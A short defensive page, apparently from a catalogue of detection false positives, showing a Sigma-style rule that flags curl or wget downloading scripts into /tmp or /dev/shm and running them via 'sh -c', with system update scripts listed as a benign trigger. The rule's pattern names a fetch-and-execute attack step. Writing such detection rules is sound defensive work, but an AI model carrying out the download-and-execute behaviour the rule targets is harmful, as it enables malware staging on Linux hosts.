LoFP LoFP / system update scripts using temporary files

Techniques

Sample rules

Suspicious Download and Execute Pattern via Curl/Wget

Description

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.

Detection logic

condition: all of selection_*
selection_downloader:
  CommandLine|contains:
  - /curl
  - /wget
selection_executor:
  CommandLine|contains: sh -c
selection_tmp:
  CommandLine|contains:
  - /tmp/
  - /dev/shm/